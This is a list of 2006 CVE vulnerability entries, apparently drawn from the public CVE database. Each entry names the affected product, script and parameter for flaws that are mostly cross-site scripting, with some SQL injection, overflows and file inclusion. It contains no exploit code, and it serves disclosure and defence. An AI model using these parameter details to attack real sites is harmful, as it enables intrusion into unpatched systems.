[CVE-2006-2028] Cross-site scripting (XSS) vulnerability in imagelist.php in Jeremy Ashcraft Simplog 0.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the imagedir parameter. NOTE: this issue might be resultant from directory traversal.
[CVE-2006-2016] Multiple cross-site scripting (XSS) vulnerabilities in phpLDAPadmin 0.9.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) dn parameter in (a) compare_form.php, (b) copy_form.php, (c) rename_form.php, (d) template_engine.php, and (e) delete_form.php.
[CVE-2006-2015] Cross-site scripting (XSS) vulnerability in SL_site 1.0 allows remote attackers to inject arbitrary web script or HTML via the recherche parameter in recherche.php. NOTE: other XSS vectors, as reported in the original disclosure, are resultant from other primary vulnerabilities that have separate CVE names.
[CVE-2006-2011] Cross-site scripting (XSS) vulnerability in member.php in 4images 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the nickname, probably involving the user_name parameter in register.php.
[CVE-2006-2003] Cross-site scripting (XSS) vulnerability in cgi-bin/guest in Community Architect Guestbook allows remote attackers to inject arbitrary web script or HTML by signing the guestbook, which is displayed by fsguestbook.html. NOTE: the provenance of this information is unknown.
[CVE-2006-2001] Cross-site scripting (XSS) vulnerability in index.php in Scry Gallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the p parameter. NOTE: this is a different vulnerability than the directory traversal vector.
[CVE-2006-2000] Cross-site scripting (XSS) vulnerability in /lms/a2z.jsp in logMethods 0.9 allows remote attackers to inject arbitrary web script or HTML via the kwd parameter.
[CVE-2006-1989] Buffer overflow in the get_database function in the HTTP client in Freshclam in ClamAV 0.80 to 0.88.1 might allow remote web servers to execute arbitrary code via long HTTP headers.
[CVE-2006-1988] The WebTextRenderer(WebInternal) _CG_drawRun:style:geometry: function in Apple Safari 2.0.3 allows remote attackers to cause a denial of service (application crash) via an HTML LI tag with a large VALUE attribute (list item number), which triggers a null dereference in QPainter::drawText, probably due to a failed memory allocation that uses the VALUE.
[CVE-2006-1980] Cross-site scripting (XSS) vulnerability in W2B Online Banking allows remote attackers to inject arbitrary web script or HTML via the (1) query string, (2) SID parameter, or (3) ilang parameter.
[CVE-2006-1979] Cross-site scripting (XSS) vulnerability in mwguest.php in Manic Web MWGuest 2.1.0 allows remote attackers to inject arbitrary web script or HTML via the homepage parameter.
[CVE-2006-1977] Cross-site scripting (XSS) vulnerability in FlexBB 0.5.7 BETA and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) message parameters.
[CVE-2006-1976] Cross-site scripting (XSS) vulnerability in addRequest.php in Prayer Request Board (PRB) Beta 1 before 20060320 allows remote attackers to inject arbitrary web script or HTML via the Request field.
[CVE-2006-1975] Cross-site scripting (XSS) vulnerability in guestbook_newentry.php in PHP-Gastebuch 1.61 allows remote attackers to inject arbitrary web script or HTML via the Kommentar field.
[CVE-2006-1972] Cross-site scripting (XSS) vulnerability in EasyGallery.php in Wingnut EasyGallery allows remote attackers to inject arbitrary web script or HTML via the ordner parameter.
[CVE-2006-1971] Cross-site scripting (XSS) vulnerability in login.php in KRANKIKOM ContentBoxX allows remote attackers to inject arbitrary web script or HTML via the action parameter.
[CVE-2006-1970] Cross-site scripting (XSS) vulnerability in classifieds/viewcat.cgi in KCScripts Classifieds, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter.
[CVE-2006-1969] Cross-site scripting (XSS) vulnerability in search/search.cgi in an unspecified KCScripts script, probably Search Engine or Site Search, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2006-1968] Cross-site scripting (XSS) vulnerability in news/NsVisitor.cgi in KCScripts News Publisher, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the sort_order parameter.
[CVE-2006-1967] Cross-site scripting (XSS) vulnerability in calendar/Visitor.cgi in KCScripts Calendar, distributed individually and as part of Portal Pack 6.0 and earlier, allows remote attackers to inject arbitrary web script or HTML via the sort_order parameter.
[CVE-2006-1965] Multiple cross-site scripting (XSS) vulnerabilities in aasi media Net Clubs Pro 4.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) onuser, (2) pass, (3) chatsys, (4) room, (5) username, and (6) to parameters in (a) sendim.cgi.
[CVE-2006-1961] Cisco CiscoWorks Wireless LAN Solution Engine (WLSE) and WLSE Express before 2.13, Hosting Solution Engine (HSE) and User Registration Tool (URT) before 20060419, and all versions of Ethernet Subscriber Solution Engine (ESSE) and CiscoWorks2000 Service Management Solution (SMS) allow local users to gain Linux shell access via shell metacharacters in arguments to the "show" command in the application's command line interface (CLI), aka bug ID CSCsd21502 (WLSE), CSCsd22861 (URT), and CSCsd22859 (HSE). NOTE: other issues might be addressed by the Cisco advisory.
[CVE-2006-1957] The com_rss option (rss.php) in (1) Mambo and (2) Joomla! allows remote attackers to cause a denial of service (disk consumption and possibly web-server outage) via multiple requests with different values of the feed parameter.
[CVE-2006-1950] Multiple cross-site scripting (XSS) vulnerabilities in banners.cgi in PerlCoders BannerFarm 2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) aff and (2) cat parameters.
[CVE-2006-1946] Multiple cross-site scripting (XSS) vulnerabilities in Visale 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the keyval parameter in pbpgst.cgi, (2) the catsubno parameter in pblscg.cgi, and (3) the listno parameter in pblsmb.cgi.
[CVE-2006-1945] Cross-site scripting (XSS) vulnerability in awstats.pl in AWStats 6.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the config parameter. NOTE: this might be the same core issue as CVE-2005-2732.
[CVE-2006-1944] Multiple cross-site scripting (XSS) vulnerabilities in SibSoft CommuniMail 1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the list_id parameter in mailadmin.cgi and (2) the form_id parameter in templates.cgi.
[CVE-2006-1943] Multiple cross-site scripting (XSS) vulnerabilities in Smarter Scripts IntelliLink Pro 5.06 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter in addlink_lwp.cgi and the (2) id, (3) forgotid, and (4) forgotpass parameters in edit.cgi.
[CVE-2006-1942] Mozilla Firefox 1.5.0.2 and possibly other versions before 1.5.0.4, Netscape 8.1, 8.0.4, and 7.2, and K-Meleon 0.9.13 allow user-assisted remote attackers to open local files via a web page with an IMG element containing a SRC attribute with a non-image file:// URL, then tricking the user into selecting View Image for the broken image, as demonstrated using a .wma file to launch Windows Media Player, or by referencing an "alternate web page."
[CVE-2006-1923] Multiple cross-site scripting (XSS) vulnerabilities in LinPHA before 1.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) RSS/RSS.php and (2) possibly other vectors.
[CVE-2006-1918] Multiple cross-site scripting (XSS) vulnerabilities in Papoo 2.1.5 allow remote attackers to inject arbitrary web script or HTML via the menuid parameter to (1) index.php or (2) forum.php, or the (3) reporeid_print parameter to print.php.
[CVE-2006-1916] Multiple cross-site scripting (XSS) vulnerabilities in profile.php in DbbS 2.0-alpha and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ulocation or (2) uhobbies parameters.
[CVE-2006-1913] Cross-site scripting (XSS) vulnerability in jax_guestbook.php in Jax Guestbook 3.1, 3.31, and 3.50 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-1911] Cross-site scripting (XSS) vulnerability in MyBB (MyBulletinBoard) 1.1 allows remote attackers to inject arbitrary web script or HTML via the attachment content disposition in an HTML attachment.
[CVE-2006-1908] Cross-site scripting (XSS) vulnerability in addevent.php in myEvent 1.x allows remote attackers to inject arbitrary web script or HTML via the event_desc parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-1906] Cross-site scripting (XSS) vulnerability in index.php in jjgan852 phpLister 0.4.1 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-1904] Cross-site scripting (XSS) vulnerability in index.php in AnimeGenesis Gallery allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2006-1903] Multiple cross-site scripting (XSS) vulnerabilities in UserLand Manila allow remote attackers to inject arbitrary web script or HTML (1) via the referer parameter in sendMail, and via attributes of (2) the A element and certain other HTML elements in web pages edited with the editInBrowser module. NOTE: the msgReader$1 mode attack vector is already covered by CVE-2006-1769.
[CVE-2006-1900] Multiple buffer overflows in World Wide Web Consortium (W3C) Amaya 9.4, and possibly other versions including 8.x before 8.8.5, allow remote attackers to execute arbitrary code via a long value in (1) the COMPACT attribute of the COLGROUP element, (2) the ROWS attribute of the TEXTAREA element, and (3) the COLOR attribute of the LEGEND element.
[CVE-2006-1899] Multiple cross-site scripting (XSS) vulnerabilities in dev Neuron Blog 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) website parameters.
[CVE-2006-1898] Multiple cross-site scripting (XSS) vulnerabilities in Ralph Capper Tiny PHP Forum (TPF) 3.6 allow remote attackers to inject arbitrary web script or HTML via (1) the uname parameter in a view action in profile.php and (2) a login name. NOTE: the "Access to hash password" issue is already covered by CVE-2006-0103.
[CVE-2006-1897] Webplus (aka talentsoft) Web+Shop 5.3.6, when Redirect URL for "Script Not Found" Error is not configured, allows remote attackers to obtain sensitive information via a quote (') or possibly other invalid value in the storeid parameter in store.wml in webplus.exe, which reveals the path in a "Script Not Found" error message.
[CVE-2006-1894] Cross-site scripting (XSS) vulnerability in RevoBoard 1.8, as derived from PunBB, allows remote attackers to inject arbitrary web script or HTML via a substitution cipher of the email tag, which is transformed when the application's e-mail address obfuscator reverses the transformation. NOTE: it is not clear whether this is a site-specific issue.
[CVE-2006-1893] Cross-site scripting (XSS) vulnerability in print.php in ar-blog 5.2 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2006-1891] Cross-site scripting (XSS) vulnerability in Martin Scheffler betaboard 0.1 allows remote attackers to inject arbitrary web script or HTML via a user's profile, possibly using the FormVal_profile parameter. NOTE: it is not clear whether this is a distributable product or a site-specific vulnerability. If it is site-specific, then it should not be included in CVE.
[CVE-2006-1890] Multiple PHP remote file inclusion vulnerabilities in myWebland myEvent 1.2 allow remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter in (1) event.php and (2) initialize.php. NOTE: vector 2 was later reported to affect 1.4 as well.
[CVE-2006-1889] Cross-site scripting (XSS) vulnerability in the search action handler in index.php in Nils Asmussen (aka SCRIPTSOLUTION) Boardsolution 1.12 and earlier allows remote attackers to inject arbitrary web script or HTML via the "Search for" item (keyword parameter).
[CVE-2006-1888] phpGraphy 0.9.11 and earlier allows remote attackers to bypass authentication and gain administrator privileges via a direct request to index.php with the editwelcome parameter set to 1, which can then be used to modify the main page to inject arbitrary HTML and web script. NOTE: XSS attacks are resultant from this issue, since normal functionality allows the admin to modify pages.
[CVE-2006-1878] Cross-site scripting (XSS) vulnerability in index.php in phpFaber TopSites allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-1854] ** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in BluePay Manager 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML during a login action via the (1) Account Name and (2) Username field. NOTE: the vendor has disputed this vulnerability, saying that "it does not exist currently in the Bluepay 2.0 product," and older versions might not have been affected either. As of 20060512, CVE has not formally investigated this dispute.
[CVE-2006-1850] Multiple cross-site scripting (XSS) vulnerabilities in xFlow 5.46.11 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) level, (2) position, (3) id, and (4) action parameters to members_only/index.cgi, and the (5) page parameter to customer_area/index.cgi.
[CVE-2006-1848] Multiple cross-site scripting (XSS) vulnerabilities in stats_view.php in LinPHA 1.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, and (3) date parameter.
[CVE-2006-1846] Cross-site scripting (XSS) vulnerability in the Your_Account module in PHP-Nuke 7.8 might allow remote attackers to inject arbitrary HTML and web script via the ublock parameter, which is saved in the user's personal menu. NOTE: the provenance of this information is unknown.
[CVE-2006-1843] Cross-site scripting (XSS) vulnerability in global.php in ShoutBOOK 1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) LOCATION and (2) URL parameters. NOTE: the provenance of this information is unknown.
[CVE-2006-1842] Cross-site scripting (XSS) vulnerability in global.php in ShoutBOOK 1.1 allows remote attackers to inject arbitrary web script or HTML via the (1) NAME and (2) COMMENTS parameters.
[CVE-2006-1841] Cross-site scripting (XSS) vulnerability in search.php in boastMachine (bMachine) 2.7, and possibly other versions before 2.9b, allows remote attackers to inject arbitrary web script or HTML via the key parameter, as used by the search field.
[CVE-2006-1835] Cross-site scripting (XSS) vulnerability in yearcal.php in Calendarix allows remote attackers to inject arbitrary web script or HTML via the ycyear parameter.
[CVE-2006-1833] Intel RNG Driver in NetBSD 1.6 through 3.0 may incorrectly detect the presence of the pchb interface, which will cause it to always generate the same random number, which allows remote attackers to more easily crack encryption keys generated from the interface.
[CVE-2006-1826] Multiple cross-site scripting (XSS) vulnerabilities in Snipe Gallery 3.1.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) gallery_id parameter in view.php, (2) keyword parameter in search.php, and (3) image_id parameter in image.php. NOTE: it is possible that vectors 1 and 3 are resultant from SQL injection.
[CVE-2006-1825] Cross-site scripting (XSS) vulnerability in index.php in phpLinks 2.1.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the term parameter.
[CVE-2006-1824] Multiple cross-site scripting (XSS) vulnerabilities in PhpGuestbook.php in PhpGuestbook 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) Name, (2) Website, and (3) Comment parameter.
[CVE-2006-1822] Cross-site scripting (XSS) vulnerability in search.php in FarsiNews 2.5.3 Pro and earlier allows remote attackers to inject arbitrary web script or HTML via the selected_search_arch parameter.
[CVE-2006-1820] Cross-site scripting (XSS) vulnerability in index.php in ModX 0.9.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this might be resultant from the directory traversal vulnerability.
[CVE-2006-1819] Directory traversal vulnerability in the loadConfig function in index.php in phpWebSite 0.10.2 and earlier allows remote attackers to include arbitrary local files and execute arbitrary PHP code via the hub_dir parameter, as demonstrated by including access_log. NOTE: in some cases, arbitrary remote file inclusion could be performed under PHP 5 using an SMB share argument such as "\\systemname\sharename".
[CVE-2006-1818] Multiple cross-site scripting (XSS) vulnerabilities in warforge.NEWS 1.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly including the (1) first_name and (2) last_name parameter in myaccounts.php. NOTE: portions of these details were obtained from third party sources instead of the original disclosure.
[CVE-2006-1815] Multiple cross-site scripting (XSS) vulnerabilities in register.php in Tritanium Bulletin Board (TBB) 1.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) newuser_realname and (2) newuser_icq parameters, a different vector than CVE-2006-1768. NOTE: the provenance of this information is unknown.
[CVE-2006-1813] Directory traversal vulnerability in index.php in phpWebFTP 3.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the language parameter.
[CVE-2006-1812] phpWebFTP 3.2 and earlier stores script.js under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information.
[CVE-2006-1810] Multiple cross-site scripting (XSS) vulnerabilities in FlexBB 0.5.5 BETA allow remote attackers to inject arbitrary web script or HTML via the (1) ICQ, (2) AIM, (3) MSN, (4) Google Talk, (5) Website Name, (6) Website Address, (7) Email Address, (8) Location, (9) Signature, and (10) Sub-Titles fields in the user profile.
[CVE-2006-1808] Cross-site scripting (XSS) vulnerability in index.php in Lifetype 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the show parameter in a Template operation.
[CVE-2006-1806] Cross-site scripting (XSS) vulnerability in index.php in Musicbox 2.3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the term parameter in a search action.
[CVE-2006-1803] Cross-site scripting (XSS) vulnerability in sql.php in phpMyAdmin 2.7.0-pl1 allows remote attackers to inject arbitrary web script or HTML via the sql_query parameter.
[CVE-2006-1802] Cross-site scripting (XSS) vulnerability in index.php in TinyWebGallery 1.3 and 1.4 allows remote attackers to inject arbitrary web script or HTML via the twg_album parameter.
[CVE-2006-1801] Cross-site scripting (XSS) vulnerability in planetsearchplus.php in planetSearch+ allows remote attackers to inject arbitrary web script or HTML via the search_exp parameter.
[CVE-2006-1797] The kernel in NetBSD-current before September 28, 2005 allows local users to cause a denial of service (system crash) by using the SIOCGIFALIAS ioctl to gather information on a non-existent alias of a network interface, which causes a NULL pointer dereference.
[CVE-2006-1796] Cross-site scripting (XSS) vulnerability in the paging links functionality in template-functions-links.php in Wordpress 1.5.2, and possibly other versions before 2.0.1, allows remote attackers to inject arbitrary web script or HTML to Internet Explorer users via the request URI ($_SERVER['REQUEST_URI']).
[CVE-2006-1795] Cross-site scripting (XSS) vulnerability in tablepublisher.cgi in UPDI Network Enterprise @1 Table Publisher 2006-03-23 allows remote attackers to inject arbitrary web script or HTML via the Title of Table field.
[CVE-2006-1786] Cross-site scripting (XSS) vulnerability in Adobe Document Server for Reader Extensions 6.0 allows remote attackers to inject arbitrary web script or HTML via (1) the actionID parameter in ads-readerext and (2) the op parameter in AlterCast. NOTE: it is not clear whether the vendor advisory addresses this issue.
[CVE-2006-1785] Adobe Document Server for Reader Extensions 6.0 allows remote authenticated users to inject arbitrary web script via a leading (1) ftp or (2) http URI in the ReaderURL variable in the "Update Download Site" section of ads-readerext. NOTE: it is not clear whether the vendor advisory addresses this issue. In addition, since the issue requires administrative privileges to exploit, it is not clear whether this crosses security boundaries.
[CVE-2006-1783] Cross-site scripting (XSS) vulnerability in PatroNet CMS allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2006-1779] Cross-site scripting (XSS) vulnerability in login.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the btag parameter.
[CVE-2006-1775] Multiple cross-site scripting (XSS) vulnerabilities in phpBB 2.0.19 allow remote attackers to inject arbitrary web script or HTML via the (1) Site Description field in (a) admin_board.php, the (2) Group name and (3) Group description fields in (b) admin_groups.php and (c) groupcp.php, the (4) Theme Name field in (d) admin_styles.php, and the (5) Rank Title field in (e) admin_ranks.php. NOTE: the profile.php/Current password vector is already covered by CVE-2006-1603.
[CVE-2006-1769] Multiple cross-site scripting (XSS) vulnerabilities in UserLand Manila 9.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the mode parameter in msgReader$1 and (2) the end of the URI in viewDepartment$.
[CVE-2006-1768] Multiple cross-site scripting (XSS) vulnerabilities in register.php in Tritanium Bulletin Board (TBB) 1.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) newuser_name, (2) newuser_email, and (3) newuser_hp parameters in the faction=register mode in index.php.
[CVE-2006-1765] Cross-site scripting (XSS) vulnerability in index.php in JBook 1.3 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-1764] Hosting Controller 6.1 stores forum/db/forum.mdb under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as user name and password credentials. NOTE: the provenance of this information is unknown.
[CVE-2006-1761] Cross-site scripting vulnerability in index.php in blur6ex 0.3.452 allows remote attackers to inject arbitrary web script or HTML via the errormsg parameter, which is not sanitized in the error message. NOTE: the vector in the shard parameter is not XSS and has been assigned a separate name.
[CVE-2006-1760] Multiple cross-site scripting (XSS) vulnerabilities in JetPhoto allow remote attackers to inject arbitrary web script or HTML via the page parameter in (1) Classic.view/thumbnail.php, (2) Classic.view/gallery.php, (3) Classic.view/detail.php, or (4) Orange.view/detail.php.
[CVE-2006-1759] Cross-site scripting (XSS) vulnerability in allgemein_transfer.php in SWSoft Confixx 3.1.2 allows remote attackers to inject arbitrary web script or HTML via the jahr parameter.
[CVE-2006-1757] Cross-site scripting (XSS) vulnerability in index.php in Vegadns 0.99 allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2006-1752] Multiple cross-site scripting (XSS) vulnerabilities in the backend in MvBlog before 1.6 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) body fields in a comment.
[CVE-2006-1750] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Autogallery 0.41 allow remote attackers to inject arbitrary web script or HTML via the (1) pic or (2) show parameters.
[CVE-2006-1748] Cross-site scripting (XSS) vulnerability in XMB Forum 1.9.5 allows remote attackers to inject arbitrary web script or HTML by uploading a Flash (.SWF) video that contains a getURL function call, which causes the video to be rendered without disabling ActionScript.
[CVE-2006-1745] Cross-site scripting (XSS) vulnerability in login.php in Bitweaver 1.3 allows remote attackers to inject arbitrary web script or HTML via the error parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-1722] Cross-site scripting (XSS) vulnerability in suche.htm in ShopXS 4.0 allows remote attackers to inject arbitrary web script or HTML via the Suchstring1 (aka search) parameter.
[CVE-2006-1720] Cross-site scripting (XSS) vulnerability in search.php in SaphpLesson 3.0 allows remote attackers to inject arbitrary web script or HTML via the Word parameter. NOTE: it is possible that this issue is resultant from SQL injection.
[CVE-2006-1718] Magus Perde Clever Copy 3.0 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to view the database username and password via a direct request for connect.inc.
[CVE-2006-1717] Cross-site scripting (XSS) vulnerability in newthread.php in MyBB (aka MyBulletinBoard) 1.10, when configured to permit new threads by unregistered users, allows remote attackers to inject arbitrary web script or HTML via the username.
[CVE-2006-1716] Cross-site scripting (XSS) vulnerability in inc/functions_post.php in MyBB (aka MyBulletinBoard) 1.10 allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in a BBCode img tag. NOTE: the email vector is already covered by CVE-2006-1625, although it might stem from the same core issue.
[CVE-2006-1713] Cross-site scripting (XSS) vulnerability in index.php in Christoph Roeder phpMyForum 4.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-1712] Cross-site scripting (XSS) vulnerability in the private archive script (private.py) in GNU Mailman 2.1.7 allows remote attackers to inject arbitrary web script or HTML via the action argument.
[CVE-2006-1709] Cross-site scripting (XSS) vulnerability in shop_main.cgi in interaktiv.shop 5 allows remote attackers to inject arbitrary web script or HTML via the (1) pn and (2) sbeg parameters.
[CVE-2006-1701] Cross-site scripting (XSS) vulnerability in the Pages module in Shadowed Portal allows remote attackers to inject arbitrary web script or HTML via the page parameter to load.php.
[CVE-2006-1700] Buy.php in Aweb Scripts Seller uses predictable cookies for authentication based on the time and the script number, which allows remote attackers to bypass authentication.
[CVE-2006-1699] Cross-site scripting (XSS) vulnerability in index.php in Aweb Banner Generator 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the banner parameter in view mode.
[CVE-2006-1698] Cross-site scripting (XSS) vulnerability in Matt Wright Guestbook 2.3.1 allows remote attackers to execute arbitrary web script or HTML via the (1) url, (2) city, (3) state, or (4) country parameters. NOTE: the provenance of this information is unknown.
[CVE-2006-1697] Cross-site scripting (XSS) vulnerability in Matt Wright Guestbook 2.3.1 allows remote attackers to execute arbitrary web script or HTML via the (1) Your Name, (2) E-Mail, or (3) Comments fields when posting a message.
[CVE-2006-1696] Cross-site scripting (XSS) vulnerability in Gallery before 1.5.3 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-1690] Cross-site scripting (XSS) vulnerability in subscribe.php in MWNewsletter 1.0.0b allows remote attackers to inject arbitrary web script or HTML via the user_name parameter.
[CVE-2006-1687] Cross-site scripting (XSS) vulnerability in APT-webshop-system 4.0 PRO, 3.0 BASIC, and 3.0 LIGHT allows remote attackers to inject arbitrary web script or HTML via the message parameter, probably involving the basket functionality.
[CVE-2006-1686] Unspecified vulnerability in modules.php in APT-webshop-system 4.0 PRO, 3.0 BASIC, and 3.0 LIGHT allows remote attackers to access unspecified files via a modified warp parameter.
[CVE-2006-1685] Multiple SQL injection vulnerabilities in modules.php in APT-webshop-system 4.0 PRO, 3.0 BASIC, and 3.0 LIGHT allow remote attackers to execute arbitrary SQL commands via the (1) group, (2) seite, and (3) id parameter, possibly involving the artikel functionality. NOTE: this vulnerability also allows resultant path disclosure when the SQL queries are invalid.
[CVE-2006-1682] Cross-site scripting (XSS) vulnerability in webplus.exe in TalentSoft Web+Shop 5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the deptname parameter, possibly involving the webpshop/ department.wml script.
[CVE-2006-1681] Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
[CVE-2006-1679] Cross-site scripting (XSS) vulnerability in modules/online.php in Jupiter CMS 1.1.5 allows remote attackers to inject arbitrary web script or HTML via the layout parameter to index.php.
[CVE-2006-1678] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.8.0.3 allow remote attackers to inject arbitrary web script or HTML via unknown vectors in unspecified scripts in the themes directory.
[CVE-2006-1675] Multiple cross-site scripting (XSS) vulnerabilities in PHPWebGallery 1.4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat, (2) num, and (3) search parameters to (a) category.php, and the (4) slideshow, (5) show_metadata, and (6) start parameters to (b) picture.php, a different vulnerability than CVE-2006-1674.
[CVE-2006-1674] Cross-site scripting (XSS) vulnerability in search.php in PHPWebGallery 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vulnerability than CVE-2006-1675.
[CVE-2006-1673] Cross-site scripting (XSS) vulnerability in vbugs.php in Dark_Wizard vBug Tracker 3.5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the sortorder parameter.
[CVE-2006-1665] Multiple cross-site scripting (XSS) vulnerabilities in Arab Portal 2.0.1 stable allow remote attackers to inject arbitrary web script or HTML via the (1) adminJump and (2) forum_middle parameters in (a) forum.php, and the (3) form parameter in (b) members.php, (c) pm.php, and (d) mail.php.
[CVE-2006-1661] Multiple cross-site scripting (XSS) vulnerabilities in SKForum 1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) areaID parameter in area.View.action, (2) time parameter in planning.View.action, and (3) userID parameter in user.View.action.
[CVE-2006-1660] Cross-site scripting (XSS) vulnerability in image_desc.php in Softbiz Image Gallery allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-1657] Cross-site scripting (XSS) vulnerability in index.php in Chucky A. Ivey N.T. 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter, which is not filtered when the administrator views the "Login Log" page.
[CVE-2006-1645] Cross-site scripting (XSS) vulnerability in Anton Vlasov and Rostislav Gaitkuloff ReloadCMS 1.2.5 and earlier allows remote attackers to inject arbitrary web script or HTML and gain leverage to execute arbitrary PHP code via the User-Agent HTTP header, which is displayed by admin/modules/general/statistic.php in the administration panel.
[CVE-2006-1642] Cross-site scripting (XSS) vulnerability in Interact 2.1.1 allows remote attackers to inject arbitrary web script or HTML via (1) the search_terms parameter to (a) search.php, and (2) the first_name, (3) last_name, (4) email, (5) password, and (6) confirm_password parameters to (b) userinput.php. NOTE: the provenance of this information is unknown.
[CVE-2006-1640] Cross-site scripting (XSS) vulnerability in news.php in CzarNews 1.14 allows remote attackers to inject arbitrary web script or HTML via the email parameter.
[CVE-2006-1638] Multiple SQL injection vulnerabilities in aWebBB 1.2 allow remote attackers to execute arbitrary SQL commands via the (1) Username parameter to (a) accounts.php, (b) changep.php, (c) editac.php, (d) feedback.php, (e) fpass.php, (f) login.php, (g) post.php, (h) reply.php, or (i) reply_log.php.
[CVE-2006-1637] Multiple cross-site scripting (XSS) vulnerabilities in aWebBB 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) tname or (2) fpost parameters to (a) post.php.
[CVE-2006-1634] Cross-site scripting (XSS) vulnerability in index.php in LucidCMS 2.0.0 RC4 allows remote attackers to inject arbitrary web script or HTML via the command parameter.
[CVE-2006-1625] Cross-site scripting (XSS) vulnerability in inc/functions_post.php in MyBB (aka MyBulletinBoard) 1.10 allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in a BBCode email tag, as demonstrated using the onmousemove event.
[CVE-2006-1622] Cross-site scripting (XSS) vulnerability in PHPSelect linksubmit allows remote attackers to inject arbitrary web script or HTML via (1) the description parameter to linklist.php and possibly other vectors involving (2) index.php and (3) linksubmit.php.
[CVE-2006-1619] IBM WebSphere Application Server 4.0.1 through 4.0.3 allows remote attackers to cause a denial of service (application crash) via an HTTP request with a large header.
[CVE-2006-1617] Multiple cross-site scripting (XSS) vulnerabilities in Advanced Poll 2.02 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to comments.php or (2) poll_id parameter to page.php. NOTE: it is possible that this issue is resultant from CVE-2006-1616.
[CVE-2006-1613] Multiple SQL injection vulnerabilities in aWebNews 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) user123 variable in (a) login.php or (b) fpass.php.
[CVE-2006-1612] Multiple cross-site scripting (XSS) vulnerabilities in visview.php in aWebNews 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) yname, (2) emailadd, (3) subject, and (4) comment parameters.
[CVE-2006-1603] Cross-site scripting (XSS) vulnerability in profile.php in phpBB 2.0.19 allows remote attackers to inject arbitrary web script or HTML via the cur_password parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-1600] SQL injection vulnerability in category.php in PhpWebGallery 1.4.1 allows remote attackers to execute arbitrary SQL commands via the search parameter.
[CVE-2006-1590] Cross-site scripting (XSS) vulnerability in the PrintFreshPage function in (1) Basic Analysis and Security Engine (BASE) 1.2.4 and (2) Analysis Console for Intrusion Databases (ACID) 0.9.6b23 allows remote attackers to inject arbitrary web script or HTML via the (a) back parameter to base_graph_main.php, (b) netmask parameter to base_stat_ipaddr.php, or (c) submit parameter to base_qry_alert.php within BASE, or (d) query string to acid_main.php in ACID, which causes the request URI ($_SERVER['REQUEST_URI']) to be inserted into a refresh operation.
